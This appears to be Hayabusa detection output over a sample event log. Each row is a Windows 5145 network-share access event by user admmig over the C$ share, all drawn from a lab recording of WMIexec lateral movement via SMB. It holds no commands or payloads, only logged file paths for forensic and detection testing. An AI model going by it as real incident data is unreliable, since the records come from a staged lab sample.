2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
